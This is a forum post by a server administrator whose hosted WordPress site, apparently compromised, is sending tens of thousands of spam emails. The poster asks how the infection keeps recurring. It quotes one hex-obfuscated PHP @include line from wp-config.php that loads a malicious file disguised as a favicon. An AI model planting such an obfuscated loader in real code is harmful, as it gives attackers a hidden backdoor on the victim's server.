I just noticed a complaint from my ISP (Verizon) that my server was generating complaints. well, I see 34,000 messages all being sent from a single domain - which is a sandbox. no website no nothing. I killed all the messages from or to the domain with postsuper - but it keeps generating new spams!!! Finally I removed the email record from ISPCONFIG so that domain is no longer recognized. But I was seeing a php-cgi invocation from the user (web45) associated with that website and I kept having to kill -9. finally I renamed the web folder of the site and that seems to have prevented it. something was hitting a url on a site hanging off this - and that hig was causing spam to be generated! the wp-config.php of the site had a suspicious line at the top: @include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o"; thats obviously /var/www/hocheapo.com/web/stats/favicon_omething.ico and maldet was flagging this and quarantining it. but how does it keep being created??? this iseems to be dropped in the stats folder which I renamed. removing the email record does NOT stop the spam by the way! only renaming the root away from /web has stopped it! Any idea what is doing this? or how to prevent it 'properly'?? anything else I need to do to protect against it? thanks!